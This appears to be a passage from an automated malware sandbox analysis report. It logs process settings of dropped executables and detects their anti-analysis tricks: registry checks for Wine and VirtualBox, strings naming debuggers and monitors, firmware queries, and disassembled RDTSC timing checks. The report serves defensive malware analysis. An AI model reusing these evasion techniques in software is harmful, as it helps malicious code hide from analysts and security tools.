Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F09BA second address: 8F09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EDDh 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FB7D50A5ED6h 0x00000014 jns 00007FB7D50A5ED6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF9E6 second address: 8EF9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF9EC second address: 8EF9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EF9F0 second address: 8EF9F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFC35 second address: 8EFC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB7D50A5EE3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFC4F second address: 8EFC69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB7D509B855h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFC69 second address: 8EFC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007FB7D50A5ED6h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jp 00007FB7D50A5ED6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFC88 second address: 8EFC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFC8E second address: 8EFC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE09 second address: 8EFE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE15 second address: 8EFE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnp 00007FB7D50A5ED8h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB7D50A5EDEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE36 second address: 8EFE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE3A second address: 8EFE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE46 second address: 8EFE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE4A second address: 8EFE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 jmp 00007FB7D50A5EE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8EFE80 second address: 8EFE84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F0284 second address: 8F0288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F0288 second address: 8F028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F028E second address: 8F02AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EDCh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F3E18 second address: 8F3E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F3F73 second address: 8F3F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F3F79 second address: 8F3F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F3F85 second address: 8F3F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F3FED second address: 8F4005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FB7D509B84Ch 0x0000000b jg 00007FB7D509B846h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F4005 second address: 8F400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F400A second address: 8F400F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F400F second address: 8F408C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB7D50A5ED8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D2A8Ah] 0x00000028 mov dl, cl 0x0000002a push 00000000h 0x0000002c jmp 00007FB7D50A5EE7h 0x00000031 call 00007FB7D50A5ED9h 0x00000036 push ebx 0x00000037 jl 00007FB7D50A5EDCh 0x0000003d jnp 00007FB7D50A5ED6h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB7D50A5EE7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F408C second address: 8F40A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB7D509B850h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F40A0 second address: 8F40C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB7D50A5EE4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F40C6 second address: 8F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F40D1 second address: 8F40EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007FB7D50A5EDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F40EC second address: 8F4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB7D509B848h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 stc 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D3889h], edx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D3858h], eax 0x00000032 je 00007FB7D509B84Ch 0x00000038 mov dword ptr [ebp+122D3A6Dh], eax 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FB7D509B848h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Ch 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a call 00007FB7D509B849h 0x0000005f push ecx 0x00000060 jnp 00007FB7D509B848h 0x00000066 pop ecx 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b jne 00007FB7D509B846h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F4173 second address: 8F41DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007FB7D50A5EE5h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FB7D50A5EDBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push edi 0x0000001e push eax 0x0000001f jbe 00007FB7D50A5ED6h 0x00000025 pop eax 0x00000026 pop edi 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FB7D50A5ED8h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 lea ebx, dword ptr [ebp+12458D75h] 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c je 00007FB7D50A5ED6h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E6599 second address: 8E65E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB7D509B846h 0x00000008 jmp 00007FB7D509B851h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 pushad 0x00000012 jno 00007FB7D509B846h 0x00000018 jg 00007FB7D509B846h 0x0000001e jo 00007FB7D509B846h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jnp 00007FB7D509B846h 0x0000002f jmp 00007FB7D509B851h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CAA second address: 912CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CB0 second address: 912CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CB6 second address: 912CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CBA second address: 912CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B852h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CD3 second address: 912CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnl 00007FB7D50A5EDCh 0x0000000e jnp 00007FB7D50A5EE4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912CFF second address: 912D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913158 second address: 913160 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913D7F second address: 913D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913D89 second address: 913D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 913D8F second address: 913D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909090 second address: 909098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909098 second address: 90909C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E9A53 second address: 8E9A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB7D50A5ED6h 0x0000000a jnl 00007FB7D50A5ED6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8E9A63 second address: 8E9A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
